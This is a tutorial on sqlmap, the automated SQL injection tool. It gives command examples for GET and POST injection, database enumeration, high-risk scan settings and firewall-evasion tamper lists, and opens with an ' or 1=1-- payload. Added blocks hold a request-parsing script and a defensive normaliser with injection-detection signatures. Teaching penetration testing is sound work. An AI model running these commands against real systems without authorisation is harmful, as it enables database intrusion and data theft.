SQLmap Commands: A Tutorial on SQLmap With Examples (Updated 2019)

Select * from table where read_post = '' or 1=1--'

Introduction & Pre-requisite

sqlmap is an automated penetration testing tool for SQL injection, the attack class ranked A1 (Injection) in the OWASP Top 10 2017. It is a different vulnerability class from Cross-Site Request Forgery.

In this post, you will learn more about the different types of sqlmap commands and switches.

The downloading and installing of sqlmap is pretty straightforward.

If you are using Kali Linux or any other popular Linux distribution, Git is already installed and you can skip the next step.

Type the following command to install Git if it is not installed.

sudo apt-get install git

With git installed, you can clone the latest version of sqlmap by entering the following command. This will automatically download all the files in the sqlmap project.

git clone https://github.com/sqlmapproject/sqlmap.git

Usage & Examples

1) GET Request

This method is most commonly used where the parameters are in the URL.

python sqlmap -u "https://target.com/index.php?name=abc*&lastname=def"

The switches used in the above sqlmap command are:

-u = URL

* = marks the injection point, i.e. which parameter to test (name in this case)

2) POST Request

For POST requests, the parameters are located in the body of the HTTP request, so additional steps are required before sqlmap is able to detect and test those parameters.

2.1) Parsing using BurpSuite

Step 1: Intercept the post request using BurpSuite

Step 2: Right-click on the panel and click on “Copy to file”

Step 3: Pass the saved request file to sqlmap using the -r switch

An example of the command is as follows:

python sqlmap -r /file.txt -p "def" --dbs --threads 5

The switches used in the above sqlmap command are:

-r = Request file

-p = Parameter to test

--dbs = Enumerate databases

--threads = Number of concurrent threads

An example of a POST request:

POST /bedita-3.5.0.corylus.2261e29/bedita/index.php/newsletter/saveMailGroups HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 523
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/bedita-3.5.0.corylus.2261e29/bedita/index.php/newsletter/viewMailGroup/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: CAKEPHP=me57vjaqc2ts154qr342a6u6i2; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _ga=GA1.1.621011711.1425057132

data[MailGroup][id]=&data[MailGroup][group_name]=&data[MailGroup][area_id]=1&data[MailGroup][visible]=1&data[MailGroup][security]=none&data[MailGroup][confirmation_in_message]=Hi [$user],

your+subscription+is+now+active,+soon+you'll+receive+the "[$title]"+newsletter.&data[MailGroup][confirmation_out_message]=Hi [$user],

you+have+been+unsubscribed+from "[$title]"

2.2) Parsing directly into SQLMap

Step 1: Intercept the post request using BurpSuite

Step 2: Run the following sqlmap command:

python sqlmap -u "https://target.com/index.php" --cookie="..." --data="..."

Using the example POST request above, the value passed to the --cookie switch is the value of the Cookie header (the "Cookie:" header name itself is not part of it):

CAKEPHP=me57vjaqc2ts154qr342a6u6i2; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _ga=GA1.1.621011711.1425057132

Next, the value passed to the --data switch is the request body:

data[MailGroup][id]=&data[MailGroup][group_name]=&data[MailGroup][area_id]=1&data[MailGroup][visible]=1&data[MailGroup][security]=none&data[MailGroup][confirmation_in_message]=Hi [$user],

your+subscription+is+now+active,+soon+you'll+receive+the "[$title]"+newsletter.&data[MailGroup][confirmation_out_message]=Hi [$user],

you+have+been+unsubscribed+from "[$title]"
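As an added example (not code from this post or from the sqlmap project), the script below shows what the -r switch does with a saved request: it splits the request line, headers and body and turns them into the -u, --cookie and --data values used in section 2.2. The request text is a constructed, trimmed version of the example above, and the http scheme is an assumption because the saved request does not carry it.

```python
"""Build sqlmap's -u/--cookie/--data arguments from a raw HTTP request
saved by Burp Suite. Added example; not part of sqlmap or of this post."""
import shlex

# Constructed sample: a trimmed version of the POST request shown above.
SAMPLE_REQUEST = (
    "POST /bedita/index.php/newsletter/saveMailGroups HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: CAKEPHP=me57vjaqc2ts154qr342a6u6i2; flash=yes\r\n"
    "\r\n"
    "data[MailGroup][id]=&data[MailGroup][area_id]=1"
)


def parse_request(raw, scheme="http"):
    """Split a raw request into (method, url, headers, body).

    The first blank line ends the headers; everything after it is the
    body, including any literal newlines (as in the example above), which
    is why -r is less error-prone than pasting the body into --data."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")   # split on the first ':' only
        headers[name.strip().lower()] = value.strip()
    url = f"{scheme}://{headers['host']}{path}"   # scheme is assumed
    return method, url, headers, body


def sqlmap_args(raw, scheme="http"):
    """Return the argument list equivalent to 'sqlmap -r <file>'."""
    method, url, headers, body = parse_request(raw, scheme)
    args = ["-u", url]
    if "cookie" in headers:                 # header name is not part of --cookie
        args += ["--cookie", headers["cookie"]]
    if method == "POST" and body:           # sqlmap infers POST from --data
        args += ["--data", body]
    return args


if __name__ == "__main__":
    print("python sqlmap " + shlex.join(sqlmap_args(SAMPLE_REQUEST)))
```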

Miscellaneous sqlmap commands

Using the above methods, you should be able to test in most scenarios. However, there are also some other switches which may be useful.

Here are some useful sqlmap commands:

python sqlmap -u "https://target.com/index.php?name=abc" --threads=10
python sqlmap -u "https://target.com/index.php?name=abc" -v 3
python sqlmap -u "https://target.com/index.php?name=abc" --batch
python sqlmap -u "https://target.com/index.php?name=abc" --risk=3 --level=5
python sqlmap -u "https://target.com/index.php?name=abc" --batch --answers="keep testing=Y,sitemap=Y,skip further tests=N"
python sqlmap -u "https://target.com/index.php" --crawl=5 --crawl-exclude="logout" --forms
python sqlmap -u "https://target.com/index.php?name=abc" --tamper=apostrophemask,apostrophenullencode

For general usage:

--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

MSSQL:

--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

MySQL:

--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
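As an added defender-side example (not code from this post or from sqlmap), the normaliser below undoes the encodings applied by a subset of the tamper scripts listed above before a detector matches injection signatures, so that a rule is not blinded by the encoding alone. The signature patterns are a constructed, illustrative subset, not a complete rule set.

```python
"""Canonicalise a request parameter before SQL injection signature matching.
Added example; the tamper script names in the comments are the ones listed
above, the signature list is constructed for illustration."""
import re
import unicodedata
from urllib.parse import unquote


def normalise(value, rounds=3):
    """Return a canonical, lower-cased form of a parameter value."""
    v = value
    for _ in range(rounds):            # charencode / chardoubleencode: %2527 -> %27 -> '
        decoded = unquote(v)
        if decoded == v:
            break
        v = decoded
    v = re.sub(r"%u([0-9a-fA-F]{4})",  # charunicodeencode: %u0027 -> '
               lambda m: chr(int(m.group(1), 16)), v)
    v = unicodedata.normalize("NFKC", v)          # apostrophemask: fullwidth ' -> '
    v = v.replace("\x00", "")                      # apostrophenullencode: %00%27 -> '
    v = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", v)     # versionedkeywords: /*!50000UNION*/ -> UNION
    v = re.sub(r"/\*.*?\*/", " ", v)               # space2comment: /**/ -> space
    v = re.sub(r"(?:--|#)[^\n]*\n", " ", v)        # space2dash / space2hash / space2mysqldash
    v = v.replace("+", " ")                        # space2plus
    v = re.sub(r"\s+", " ", v)                     # space2randomblank / multiplespaces
    return v.strip().lower()                       # randomcase


# Constructed illustrative signatures; a real rule set is far larger.
SIGNATURES = [
    r"\bor\b\s+\S+\s*(=|\blike\b)\s*\S+",   # ' or 1=1 (equaltolike rewrites = to LIKE)
    r"\bunion\b(\s+all)?\s+select\b",       # union-based extraction (unionalltounion)
    r"\b(sleep|benchmark)\s*\(",            # time-based blind probes
    r"--\s*$",                              # trailing comment terminator
]


def looks_like_sqli(value):
    """True if the normalised value matches any constructed signature."""
    v = normalise(value)
    return any(re.search(p, v) for p in SIGNATURES)


if __name__ == "__main__":
    for sample in ("1/**/UnIoN/**/SeLeCt/**/1,2", "john.doe@example.com"):
        print(repr(sample), "->", repr(normalise(sample)), looks_like_sqli(sample))
```

Scripts that change the payload's logic rather than its encoding (base64encode, between, greatest) cannot be undone by normalisation; the LIKE alternative in the first signature is the only such rewrite handled here.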

These are some examples that should be sufficient to get you started. The remaining switches are documented on sqlmap's GitHub page or can be listed by entering:

python sqlmap -hh

Want to continue a scan after exiting SSH? You can read more at my tmux tutorial.